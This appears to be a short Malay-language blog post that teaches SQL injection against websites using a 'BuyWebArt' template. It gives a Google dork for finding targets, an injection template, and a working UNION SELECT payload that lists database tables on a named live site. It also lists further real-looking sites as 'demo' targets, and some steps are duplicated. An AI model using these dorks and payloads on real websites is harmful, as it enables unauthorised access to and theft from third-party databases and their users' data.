Assalamualaikum dan salam sejahtera.huhu tak boleh tidur la
pula.jom belajar lagi?
1. Cari website
target guna dork :
inurl:php?id= "graphic
web design by BuyWebArt"
2. Buka web pilihan dan SQLI seperti dibawah :
Contoh :
http://target.com/path/XXX.php?id=X&id=[SQLI DI SINI]
-----Petunjuk-------
2. Buka web pilihan dan SQLI seperti dibawah :
Contoh :
http://target.com/path/XXX.php?id=X&id=[SQLI DI SINI]
-----Petunjuk-------
XXX = nama page
X = ID page
-----------------------
-----------------------
4. Live Demo :
http://www.mudracard.com/send-gift-cards.php?id=8
Contoh (Mencari tables) :
http://www.mudracard.com/send-gift-cards.php?id=-8+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--
http://www.mudracard.com/send-gift-cards.php?id=-8+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--
----------Petunjuk-----------
HIJAU = LINK VULN
MERAH = SQLI
--------------------------------
Other demo :
- http://synergy-pune.com/page.php?id=german
- http://www.youthejournalist.com/article.php?aid=3649&sid=19
Credit to Infamous from 1337day.com
Itu saja...
Assalamualaikum~~
